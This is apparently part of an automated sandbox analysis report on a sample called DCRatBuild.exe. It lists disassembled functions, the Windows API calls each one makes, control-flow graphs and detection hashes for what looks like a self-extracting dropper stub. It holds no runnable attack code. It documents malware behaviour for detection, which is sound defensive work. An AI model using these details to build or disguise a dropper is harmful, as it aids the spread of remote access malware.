                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                        • String ID: $ ,$$%s:$$9v$*messages***$*messages***$@%s:$R$RTL$a
                                        • API String ID: 4184910265-4018081767
                                        • Opcode ID: 18a0360bd3899229a44323775fe4a7e28b6e645425bfd674812193b6c8e6cf60
                                        • Instruction ID: eb5f6b471a5b15a4d07421419f26b9e5ff38ff419ef1bda4bc0ba800739a5cd4
                                        • Opcode Fuzzy Hash: 18a0360bd3899229a44323775fe4a7e28b6e645425bfd674812193b6c8e6cf60
                                        • Instruction Fuzzy Hash: 3C12A1B1900219DAEB35DFA4EC95BEEB7B5EF04700F104569F506A7192EB78AE44CB20
                                        Function 0074CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0074AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0074AC85
                                          • Part of subcall function 0074AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0074AC96
                                          • Part of subcall function 0074AC74: IsDialogMessageW.USER32(00050160,?), ref: 0074ACAA
                                          • Part of subcall function 0074AC74: TranslateMessage.USER32(?), ref: 0074ACB8
                                          • Part of subcall function 0074AC74: DispatchMessageW.USER32(?), ref: 0074ACC2
                                        • GetDlgItem.USER32(00000068,0078ECB0), ref: 0074CB6E
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0074A632,00000001,?,?,0074AECB,00764F88,0078ECB0), ref: 0074CB96
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0074CBA1
                                        • SendMessageW.USER32(00000000,000000C2,00000000,007635B4), ref: 0074CBAF
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0074CBC5
                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0074CBDF
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0074CC23
                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0074CC31
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0074CC40
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0074CC67
                                        • SendMessageW.USER32(00000000,000000C2,00000000,0076431C), ref: 0074CC76
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                        • String ID: \
                                        • API String ID: 3569833718-2967466578
                                        • Opcode ID: f70e4baa1d7c31b82d82a448125ca6dc7b50661154d35ce623861ec79bd11a41
                                        • Instruction ID: 38ea3d3f6a99c56aa8c937c38600c1d345b0715dc96ccfef6c4392be21c7fad6
                                        • Opcode Fuzzy Hash: f70e4baa1d7c31b82d82a448125ca6dc7b50661154d35ce623861ec79bd11a41
                                        • Instruction Fuzzy Hash: B431F371285742BFD301EF24DC8AFAB7FACEB42704F00450AF65196192DB684906C7BA
                                        Function 0074CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 795 74ce22-74ce3a call 74e360 798 74ce40-74ce4c call 7535b3 795->798 799 74d08b-74d093 795->799 798->799 802 74ce52-74ce7a call 74f350 798->802 805 74ce84-74ce91 802->805 806 74ce7c 802->806 807 74ce95-74ce9e 805->807 808 74ce93 805->808 806->805 809 74ced6 807->809 810 74cea0-74cea2 807->810 808->807 812 74ceda-74cedd 809->812 811 74ceaa-74cead 810->811 813 74ceb3-74cebb 811->813 814 74d03c-74d041 811->814 815 74cee4-74cee6 812->815 816 74cedf-74cee2 812->816 817 74d055-74d05d 813->817 818 74cec1-74cec7 813->818 819 74d036-74d03a 814->819 820 74d043 814->820 821 74cef9-74cf0e call 73b493 815->821 822 74cee8-74ceef 815->822 816->815 816->821 825 74d065-74d06d 817->825 826 74d05f-74d061 817->826 818->817 823 74cecd-74ced4 818->823 819->814 824 74d048-74d04c 819->824 820->824 830 74cf27-74cf32 call 73a180 821->830 831 74cf10-74cf1d call 7417ac 821->831 822->821 827 74cef1 822->827 823->809 823->811 824->817 825->812 826->825 827->821 837 74cf34-74cf4b call 73b239 830->837 838 74cf4f-74cf5c ShellExecuteExW 830->838 831->830 836 74cf1f 831->836 836->830 837->838 840 74cf62-74cf6f 838->840 841 74d08a 838->841 843 74cf71-74cf78 840->843 844 74cf82-74cf84 840->844 841->799 843->844 847 74cf7a-74cf80 843->847 845 74cf86-74cf8f 844->845 846 74cf9b-74cfba call 74d2e6 844->846 845->846 854 74cf91-74cf99 ShowWindow 845->854 848 74cff1-74cffd CloseHandle 846->848 865 74cfbc-74cfc4 846->865 847->844 847->848 851 74d00e-74d01c 848->851 852 74cfff-74d00c call 7417ac 848->852 855 74d01e-74d020 851->855 856 74d079-74d07b 851->856 852->851 862 74d072 852->862 854->846 855->856 860 74d022-74d028 855->860 856->841 859 74d07d-74d07f 856->859 859->841 863 74d081-74d084 ShowWindow 859->863 860->856 864 74d02a-74d034 860->864 862->856 863->841 864->856 865->848 866 74cfc6-74cfd7 GetExitCodeProcess 865->866 866->848 867 74cfd9-74cfe3 866->867 868 74cfe5 867->868 869 74cfea 867->869 868->869 869->848
                                        APIs
                                        • ShellExecuteExW.SHELL32(?), ref: 0074CF54
                                        • ShowWindow.USER32(?,00000000), ref: 0074CF93
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 0074CFCF
                                        • CloseHandle.KERNEL32(?), ref: 0074CFF5
                                        • ShowWindow.USER32(?,00000001), ref: 0074D084
                                          • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                        • String ID: $.exe$.inf
                                        • API String ID: 3686203788-2452507128
                                        • Opcode ID: e91081d0fe670465e8cbe41dc164371652b0128363ae67d90c999970ff5b9d25
                                        • Instruction ID: c55ae2d3e45c5cef2bb90c3b07e89da2fb5b58ee652da63f3776400895a5b2e9
                                        • Opcode Fuzzy Hash: e91081d0fe670465e8cbe41dc164371652b0128363ae67d90c999970ff5b9d25
                                        • Instruction Fuzzy Hash: 7461F571405380EAD7329F24D8146ABBBF9EF81344F04881EF5C597261E7BD8D8ACB66
                                        Function 0075A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 870 75a058-75a071 871 75a087-75a08c 870->871 872 75a073-75a083 call 75e6ed 870->872 873 75a08e-75a096 871->873 874 75a099-75a0bd MultiByteToWideChar 871->874 872->871 879 75a085 872->879 873->874 877 75a250-75a263 call 74ec4a 874->877 878 75a0c3-75a0cf 874->878 880 75a0d1-75a0e2 878->880 881 75a123 878->881 879->871 884 75a0e4-75a0f3 call 761a30 880->884 885 75a101-75a112 call 758518 880->885 883 75a125-75a127 881->883 887 75a245 883->887 888 75a12d-75a140 MultiByteToWideChar 883->888 884->887 897 75a0f9-75a0ff 884->897 885->887 898 75a118 885->898 892 75a247-75a24e call 75a2c0 887->892 888->887 891 75a146-75a158 call 75a72c 888->891 899 75a15d-75a161 891->899 892->877 901 75a11e-75a121 897->901 898->901 899->887 902 75a167-75a16e 899->902 901->883 903 75a170-75a175 902->903 904 75a1a8-75a1b4 902->904 903->892 905 75a17b-75a17d 903->905 906 75a1b6-75a1c7 904->906 907 75a200 904->907 905->887 908 75a183-75a19d call 75a72c 905->908 910 75a1e2-75a1f3 call 758518 906->910 911 75a1c9-75a1d8 call 761a30 906->911 909 75a202-75a204 907->909 908->892 925 75a1a3 908->925 915 75a206-75a21f call 75a72c 909->915 916 75a23e-75a244 call 75a2c0 909->916 910->916 924 75a1f5 910->924 911->916 922 75a1da-75a1e0 911->922 915->916 928 75a221-75a228 915->928 916->887 927 75a1fb-75a1fe 922->927 924->927 925->887 927->909 929 75a264-75a26a 928->929 930 75a22a-75a22b 928->930 931 75a22c-75a23c WideCharToMultiByte 929->931 930->931 931->916 932 75a26c-75a273 call 75a2c0 931->932 932->892
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00754E35,00754E35,?,?,?,0075A2A9,00000001,00000001,3FE85006), ref: 0075A0B2
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0075A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0075A138
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0075A232
                                        • __freea.LIBCMT ref: 0075A23F
                                          • Part of subcall function 00758518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0075C13D,00000000,?,007567E2,?,00000008,?,007589AD,?,?,?), ref: 0075854A
                                        • __freea.LIBCMT ref: 0075A248
                                        • __freea.LIBCMT ref: 0075A26D
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 18a7409a5595200e2ede103ef1f34a1a5caa517cb136c27e31c1d7c63feed3d9
                                        • Instruction ID: 91aac2349d8bfc2fc612b7114ce2da0bf982a44781c67b67299cf099dbfc1c29
                                        • Opcode Fuzzy Hash: 18a7409a5595200e2ede103ef1f34a1a5caa517cb136c27e31c1d7c63feed3d9
                                        • Instruction Fuzzy Hash: 0251C172A10206BFDB258E64CC46EFB77A9EB84751F144739FC05D6140EBBADC48C6A2
                                        Function 0074A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00740085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007400A0
                                          • Part of subcall function 00740085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0073EB86,Crypt32.dll,00000000,0073EC0A,?,?,0073EBEC,?,?,?), ref: 007400C2
                                        • OleInitialize.OLE32(00000000), ref: 0074A34E
                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0074A385
                                        • SHGetMalloc.SHELL32(00778430), ref: 0074A38F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                        • String ID: riched20.dll$3Ro
                                        • API String ID: 3498096277-3613677438
                                        • Opcode ID: 293e0e8c78ccb74d89a00eb3a64161d8167c3699a035b62a955a04207c365b10
                                        • Instruction ID: 3c6cbb1aed4e4cdf811cd7835ad384bd56976c837937228cb688991537b5c2e2
                                        • Opcode Fuzzy Hash: 293e0e8c78ccb74d89a00eb3a64161d8167c3699a035b62a955a04207c365b10
                                        • Instruction Fuzzy Hash: 38F04FB1C0020DABCB10AF99D8499EFFBFCEF94301F00415BE814E2201CBB846068BA1
                                        Function 007399B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 939 7399b0-7399d1 call 74e360 942 7399d3-7399d6 939->942 943 7399dc 939->943 942->943 944 7399d8-7399da 942->944 945 7399de-7399fb 943->945 944->945 946 739a03-739a0d 945->946 947 7399fd 945->947 948 739a12-739a31 call 7370bf 946->948 949 739a0f 946->949 947->946 952 739a33 948->952 953 739a39-739a57 CreateFileW 948->953 949->948 952->953 954 739abb-739ac0 953->954 955 739a59-739a7b GetLastError call 73b66c 953->955 957 739ac2-739ac5 954->957 958 739ae1-739af5 954->958 964 739aaa-739aaf 955->964 965 739a7d-739a9f CreateFileW GetLastError 955->965 957->958 959 739ac7-739adb SetFileTime 957->959 960 739b13-739b1e 958->960 961 739af7-739b0f call 73fe56 958->961 959->958 961->960 964->954 969 739ab1 964->969 967 739aa1 965->967 968 739aa5-739aa8 965->968 967->968 968->954 968->964 969->954
                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,007378AD,?,00000005,?,00000011), ref: 00739A4C
                                        • GetLastError.KERNEL32(?,?,007378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00739A59
                                        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,007378AD,?,00000005,?), ref: 00739A8E
                                        • GetLastError.KERNEL32(?,?,007378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00739A96
                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,007378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00739ADB
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: File$CreateErrorLast$Time
                                        • String ID:
                                        • API String ID: 1999340476-0
                                        • Opcode ID: 5b5b38b69e9432815d6250b239698bc91689ccad4cff0ece23491326499950ea
                                        • Instruction ID: ad5f591f2ca46746cc0b43a406df7940eb222744242302968cb9fb865455a9a4
                                        • Opcode Fuzzy Hash: 5b5b38b69e9432815d6250b239698bc91689ccad4cff0ece23491326499950ea
                                        • Instruction Fuzzy Hash: D7413571544746AFF3208B20CC09BDABBD4BB05324F104719F6E5961D2E7FDA988CB95
                                        Function 0074AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 998 74ac74-74ac8d PeekMessageW 999 74ac8f-74aca3 GetMessageW 998->999 1000 74acc8-74accc 998->1000 1001 74acb4-74acc2 TranslateMessage DispatchMessageW 999->1001 1002 74aca5-74acb2 IsDialogMessageW 999->1002 1001->1000 1002->1000 1002->1001
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0074AC85
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0074AC96
                                        • IsDialogMessageW.USER32(00050160,?), ref: 0074ACAA
                                        • TranslateMessage.USER32(?), ref: 0074ACB8
                                        • DispatchMessageW.USER32(?), ref: 0074ACC2
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 1266772231-0
                                        • Opcode ID: 05b0127272dbd0130ea2b9c1e76d618cb02dca1adfbbbe473709c2e04d37ea4d
                                        • Instruction ID: 952eb8b25ae9fc68f9561a16b34c02609bcda4c4079fb130fd2b516916116ef5
                                        • Opcode Fuzzy Hash: 05b0127272dbd0130ea2b9c1e76d618cb02dca1adfbbbe473709c2e04d37ea4d
                                        • Instruction Fuzzy Hash: E3F01D71902229BB8B60ABE5EC4CEEB7F6CEE052917408416F909D2101EB2CD407C7B5
                                        Function 007576BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1003 7576bd-7576ca 1004 7576cc-7576d0 1003->1004 1005 7576e8-757711 call 75b290 GetModuleFileNameA 1003->1005 1004->1005 1006 7576d2-7576e3 call 75895a call 758839 1004->1006 1011 757713-757716 1005->1011 1012 757718 1005->1012 1017 7577dc-7577e0 1006->1017 1011->1012 1014 75771a-757744 call 7577e1 call 757956 1011->1014 1012->1014 1021 757746-757750 call 75895a 1014->1021 1022 757752-75776f call 7577e1 1014->1022 1027 757783-757785 1021->1027 1028 757787-75779a call 75ada3 1022->1028 1029 757771-75777e 1022->1029 1030 7577d1-7577db call 7584de 1027->1030 1035 7577a1-7577aa 1028->1035 1036 75779c-75779f 1028->1036 1029->1027 1030->1017 1038 7577b4-7577c1 1035->1038 1039 7577ac-7577b2 1035->1039 1037 7577c7-7577ce call 7584de 1036->1037 1037->1030 1038->1037 1039->1038 1039->1039
                                        APIs
                                        • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\DCRatBuild.exe,00000104), ref: 007576FD
                                        • _free.LIBCMT ref: 007577C8
                                        • _free.LIBCMT ref: 007577D2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                        • API String ID: 2506810119-119056061
                                        • Opcode ID: d60c41c82ba6fa5b7a6502109c97ace123e69b31139995abbdb18ab4e48734ea
                                        • Instruction ID: 7478d856c54610e09b93613c81b808002902ea027796a03d03d782e3ee141869
                                        • Opcode Fuzzy Hash: d60c41c82ba6fa5b7a6502109c97ace123e69b31139995abbdb18ab4e48734ea
                                        • Instruction Fuzzy Hash: 6A319171A04209EFDB25DF99FC859DEBBFCEB88311F144066EC0497200DAB85E49CB91
                                        Function 0074A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1042 74a2c7-74a2e6 GetClassNameW 1043 74a30e-74a310 1042->1043 1044 74a2e8-74a2fd call 7417ac 1042->1044 1045 74a312-74a315 SHAutoComplete 1043->1045 1046 74a31b-74a31f 1043->1046 1049 74a30d 1044->1049 1050 74a2ff-74a30b FindWindowExW 1044->1050 1045->1046 1049->1043 1050->1049
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000050), ref: 0074A2DE
                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 0074A315
                                          • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0074A305
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                        • String ID: EDIT
                                        • API String ID: 4243998846-3080729518
                                        • Opcode ID: 252181976588606a6b9cad29420f192f42a2f56e8b3ef8db0331a012a9660fe3
                                        • Instruction ID: 585750d7b13d38d8488fb6ac9b17be3cc624bc17e6e06407b08b8ffb34bf9c19
                                        • Opcode Fuzzy Hash: 252181976588606a6b9cad29420f192f42a2f56e8b3ef8db0331a012a9660fe3
                                        • Instruction Fuzzy Hash: F9F0A732A4122CB7E7306A689C09FDB776C9F46B50F444066BD05E2181E768AD43C6FA
                                        Function 0074D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1051 74d287-74d2b2 call 74e360 SetEnvironmentVariableW call 73fbd8 1055 74d2b7-74d2bb 1051->1055 1056 74d2bd-74d2c1 1055->1056 1057 74d2df-74d2e3 1055->1057 1058 74d2ca-74d2d1 call 73fcf1 1056->1058 1061 74d2c3-74d2c9 1058->1061 1062 74d2d3-74d2d9 SetEnvironmentVariableW 1058->1062 1061->1058 1062->1057
                                        APIs
                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0074D29D
                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0074D2D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: EnvironmentVariable
                                        • String ID: sfxcmd$sfxpar
                                        • API String ID: 1431749950-3493335439
                                        • Opcode ID: 88a4d696ba82d84e9845c3c4690be072a5a00a6d60d4a693a48e35f5339d01c8
                                        • Instruction ID: 15cdc176e8c9df90ad614b52961dcb6da4f0d1f09efa2d4c8610e9ba314a4100
                                        • Opcode Fuzzy Hash: 88a4d696ba82d84e9845c3c4690be072a5a00a6d60d4a693a48e35f5339d01c8
                                        • Instruction Fuzzy Hash: 07F0A7B2D0162CE6DB302FA49C19ABA7759BF09B91F004112FC8566141D7ACCD40D7F1
                                        Function 0073984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 0073985E
                                        • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00739876
                                        • GetLastError.KERNEL32 ref: 007398A8
                                        • GetLastError.KERNEL32 ref: 007398C7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
